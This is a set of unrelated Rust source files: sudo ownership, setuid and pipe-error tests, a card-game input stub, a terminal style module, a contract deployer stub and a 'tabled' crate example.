        "sudo must be owned by uid 0 and have the setuid bit set"
    );
    Ok(())
}
// A sudo binary not owned by root must likewise refuse to run: the setuid
// bit would elevate to the (wrong) owner instead of root.
#[test]
fn sudo_binary_is_not_owned_by_root() -> Result<()> {
    let env = Env(SUDOERS_ALL_ALL_NOPASSWD).user(USERNAME).build()?;
    // Re-own the binary to an unprivileged user; the mode bits stay intact.
    Command::new("chown")
        .args([USERNAME, "/usr/bin/sudo"])
        .output(&env)?
        .assert_success()?;
    let output = Command::new("sudo")
        .arg("true")
        .as_user(USERNAME)
        .output(&env)?;
    assert!(!output.status().success());
    assert_eq!(Some(1), output.status().code());
    assert_contains!(
        output.stderr(),
        "sudo must be owned by uid 0 and have the setuid bit set"
    );
    Ok(())
}
// The ownership/setuid checks must apply to the symlink's TARGET, not the
// symlink itself: a non-root, world-writable symlink pointing at a
// correctly installed sudo must still work.
#[test]
fn works_when_invoked_through_a_symlink() -> Result<()> {
    let symlink_path = "/tmp/sudo";
    let env = Env(SUDOERS_ALL_ALL_NOPASSWD).user(USERNAME).build()?;
    Command::new("ln")
        .args(["-s", "/usr/bin/sudo", symlink_path])
        .as_user(USERNAME)
        .output(&env)?
        .assert_success()?;
    // symlink is not owned by root
    let ls_output = Command::new("ls")
        .args(["-ahl", symlink_path])
        .output(&env)?
        .stdout()?;
    // lrwxrwxrwx 1 ferris users
    eprintln!("{ls_output}");
    // symlink has not the setuid bit set
    let stat_output = Command::new("stat")
        .args(["-c", "%a", symlink_path])
        .output(&env)?
        .stdout()?;
    // 777
    eprintln!("{stat_output}");
    // still, we expect sudo to work because the executable behind the symlink has the right
    // ownership and permissions
    Command::new(symlink_path)
        .arg("true")
        .as_user(USERNAME)
        .output(&env)?
        .assert_success()
}
// Writing the usage message to an already-closed pipe must yield a clean
// exit code 1, not a panic (detected via PANIC_EXIT_CODE).
#[test]
fn does_not_panic_on_io_errors_no_command() -> Result<()> {
    let env = Env("").build()?;
    // `| true` closes sudo's stdout early; PIPESTATUS[0] is sudo's own code.
    let output = Command::new("bash")
        .args(["-c", "sudo 2>&1 | true; echo \"${PIPESTATUS[0]}\""])
        .output(&env)?;
    let exit_code = output.stdout()?.parse()?;
    assert_ne!(PANIC_EXIT_CODE, exit_code);
    assert_eq!(1, exit_code);
    Ok(())
}
// Same as above but for the CLI-error path: reporting an unknown flag to a
// closed pipe must exit 1 cleanly rather than panic.
#[test]
fn does_not_panic_on_io_errors_cli_error() -> Result<()> {
    let env = Env("").build()?;
    let output = Command::new("bash")
        .args([
            "-c",
            "sudo --bad-flag 2>&1 | true; echo \"${PIPESTATUS[0]}\"",
        ])
        .output(&env)?;
    let exit_code = output.stdout()?.parse()?;
    assert_ne!(PANIC_EXIT_CODE, exit_code);
    assert_eq!(1, exit_code);
    Ok(())
}
|
use std::io;
use std::collections::{ VecDeque };
// Parses a trimmed input line into the requested type, panicking on bad
// input (acceptable here: puzzle input is guaranteed well-formed).
macro_rules! parse_input {
    ($x:expr, $t:ident) => ($x.trim().parse::<$t>().unwrap())
}
/// One card-game participant holding an ordered deck of cards.
struct Player {
    deck: VecDeque<String>
}
impl Player {
    /// Creates a player with capacity reserved for `n` cards.
    /// The deck itself starts empty.
    fn new (n: i32) -> Self {
        let deck = VecDeque::with_capacity(n as usize);
        Self { deck }
    }
    /// Number of cards currently held.
    fn deck_len (&self) -> usize {
        self.deck.len()
    }
    /// Places `cardp` at the bottom of the deck.
    fn update_deck (&mut self, cardp: String) {
        self.deck.push_back(cardp)
    }
}
/// Reads both players' decks from stdin and prints the game result.
///
/// BUG FIX: player 1's cards were read with `for i in 0..p1.deck_len()`,
/// but a freshly constructed deck has length 0 (`with_capacity` reserves
/// space without adding elements), so no cards were ever read. Loop over
/// the announced count `n` instead, mirroring the player-2 loop.
fn main() {
    let mut input_line = String::new(); io::stdin().read_line(&mut input_line).unwrap();
    let n = parse_input!(input_line, i32); // the number of cards for player 1
    let mut p1 = Player::new(n);
    for _ in 0..n as usize {
        let mut input_line = String::new(); io::stdin().read_line(&mut input_line).unwrap();
        let cardp_1 = input_line.trim().to_string(); // the n cards of player 1
        p1.update_deck(cardp_1);
    }
    let mut input_line = String::new(); io::stdin().read_line(&mut input_line).unwrap();
    let m = parse_input!(input_line, i32); // the number of cards for player 2
    let mut p2 = Player::new(m);
    for _ in 0..m as usize {
        let mut input_line = String::new(); io::stdin().read_line(&mut input_line).unwrap();
        let cardp_2 = input_line.trim().to_string(); // the m cards of player 2
        p2.update_deck(cardp_2);
    }
    // TODO: the war game itself is not implemented; "PAT" is a placeholder.
    println!("PAT");
}
|
pub mod termion;
pub use self::termion::TermionStyles;
/// Identifier used to reference a registered style (see [`Styles`]).
pub type StyleID = i16;
/// Size of the style table — NOTE(review): presumably the maximum number of
/// styles a backend keeps; confirm against the `Styles` implementations.
pub const STYLE_LEN: usize = 20;
/// The style id 0 is reserved for the selection style id.
///
/// This id is different than the pair id.
pub const SELECTION_STYLE_ID: StyleID = 0;
/// Reserved style id — NOTE(review): presumably used for the line-number
/// section of the view; confirm against its users.
pub const LINE_SECTION_STYLE_ID: StyleID = 9999;
/// An RGB color description.
///
/// Each value defines the amount of a primary color composing it. The possible
/// values for each primary color go from `0` for the absence of color to `255`
/// for the full presence of the color.
///
/// Example:
/// ```rust,ignore
/// let black = RGBColor { r: 0, g: 0, b: 0 };
/// let white = RGBColor { r: 255, g: 255, b: 255 };
/// let red = RGBColor { r: 255, g: 0, b: 0 };
/// ```
#[derive(Debug, Clone, Copy)]
pub struct RGBColor {
    /// red
    pub r: u8,
    /// green
    pub g: u8,
    /// blue
    pub b: u8,
}
/// A terminal text style: optional background/foreground colors (stored as
/// already-encoded strings) plus an italic flag.
///
/// NOTE(review): the color strings are presumably terminal escape payloads
/// produced by the backend (see `TermionStyles`) — confirm before reuse.
#[derive(Debug, Clone, PartialEq)]
pub struct Style {
    pub background: Option<String>,
    pub foreground: Option<String>,
    pub italic: bool,
}
/// A [`Style`] applied to the span `start..end`.
///
/// NOTE(review): whether the offsets count bytes or characters is not
/// established here — confirm against the producer of these ranges.
#[derive(Debug, PartialEq, Clone)]
pub struct StyleRange {
    start: u32,
    end: u32,
    style: Style,
}
/// Backend-agnostic registry of terminal styles, addressed by [`StyleID`].
pub trait Styles {
    /// Appends `to_append` to `dest`, wrapped in the rendering of the style
    /// registered under `style_id`.
    fn append_with_style(&self, to_append: &str, style_id: StyleID, dest: &mut String);
    /// Applies the given style ids to `input` and returns the styled string.
    ///
    /// NOTE(review): how `inputs` maps onto `input` (per character? per
    /// span?) is not established here — confirm against implementations.
    fn apply_to(&self, inputs: Vec<i16>, input: &str) -> String;
    /// Registers (or replaces) style `style_id` with the given foreground
    /// and background colors and italic flag.
    fn save(
        &mut self,
        style_id: StyleID,
        fg_color: Option<RGBColor>,
        bg_color: Option<RGBColor>,
        italic: bool,
    );
}
|
#![no_main]
use managed_counter::deployer;
// Unmangled entry point invoked by the host runtime (presumably a Wasm
// smart-contract VM — confirm). Deploys the manager contract under the
// name "manager".
#[no_mangle]
pub extern "C" fn call() {
    deployer::deploy_manager_contract(String::from("manager"));
}
|
//! This example demonstrates using the [attribute macro](https://doc.rust-lang.org/reference/procedural-macros.html#attribute-macros)
//! [`rename_all`] to apply table-wide header formatting in a [`Table`] display.
//!
//! * Supported formatting rules include:
//! * 'camelCase'
//!   * 'kebab-case'
//! * 'PascalCase'
//! * 'SCREAMING_SNAKE_CASE'
//! * 'snake_case'
//! * 'lowercase'
//! * 'UPPERCASE'
//! * 'verbatim'
use tabled::{Table, Tabled};
/// One table row; column headers are derived from the field names using the
/// `rename_all` rules declared via `#[tabled(...)]`.
#[derive(Tabled)]
#[tabled(rename_all = "camelCase")]
struct Country {
    name: &'static str,
    capital_city: &'static str,
    surface_area_km2: f32,
    // The field-level rename overrides the struct-level "camelCase" rule.
    #[tabled(rename_all = "kebab-case")]
    national_currency: &'static str,
    #[tabled(rename_all = "kebab-case")]
    national_currency_short: &'static str,
}
impl Country {
fn new(
name: &'static str,
national_currency: &'static str,
national_currency_short: &'static str,
capital_city: &'static str,
surface_area_km2: f32,
) -> Self {
Self {
name,
national_currency,
national_currency_short,
capital_city,
surface_area_km2,
}
}
}
// Builds a small table of countries and prints it; the header row shows the
// effect of the `rename_all` attributes declared on `Country`.
fn main() {
    let data = [
        Country::new("Afghanistan", "Afghani", "AFN", "Kabul", 652867.0),
        Country::new("Angola", "Kwanza", "AOA", "Luanda", 1246700.0),
        Country::new("Canada", "Canadian Dollar", "CAD", "Ottawa", 9984670.0),
    ];
    let table = Table::new(data);
    println!("{table}");
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.